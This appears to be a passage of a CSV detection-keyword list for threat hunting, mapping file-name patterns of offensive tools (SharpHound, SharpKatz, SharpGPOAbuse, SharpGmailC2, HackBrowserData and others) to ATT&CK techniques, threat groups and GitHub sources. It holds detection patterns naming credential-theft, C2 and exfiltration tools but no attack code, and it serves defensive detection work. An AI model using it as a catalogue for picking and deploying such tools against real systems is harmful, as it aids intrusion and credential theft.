+"*SharpGmailC2-main*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
+"*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are 
controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z"
+"*SharpGPOAbuse*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z"
+"*SharpGPOAbuse.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpGPOAddComputer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SharpGPOAddLocalAdmin*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 
3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*SharpGPOAddUser*Manager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*Sharp-HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z"
+"*Sharp-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks 
from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z"
+"*SharpHandler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpHide.csproj*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
+"*SharpHide.exe*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
+"*SharpHide.sln*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
+"*SharpHide-master*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
+"*SharpHide-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*SharpHose.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*sharphound -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*SharpHound-*.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*sharphound*--stealth*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*sharphound.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*SharpHound.cna*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z"
+"*SharpHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*SharpHound.exe*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z"
+"*SharpHound.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*SharpHound.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpHound.exe*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*SharpHound.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*SharpHound.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z"
+"*SharpHound.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*SharpHound.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*SharpHound.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*SharpHound.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z"
+"*SharpHound2*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" 
+"*Sharphound2.*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z"
+"*SharpHound3*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*Sharphound-Aggressor*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*SharpHoundCommon.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHoundCommonLib*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharpinline *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Sharpkatz*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 
4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpKatz.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*SharpkatzManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
+"*SharpLAPS.*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" +"*SharpLAPS.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpLAPS-main*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" +"*SharpLDAP.csproj*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLDAP.exe*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLDAP.sln*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do 
enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLDAP-main*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*SharpLdapRelayScan*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" 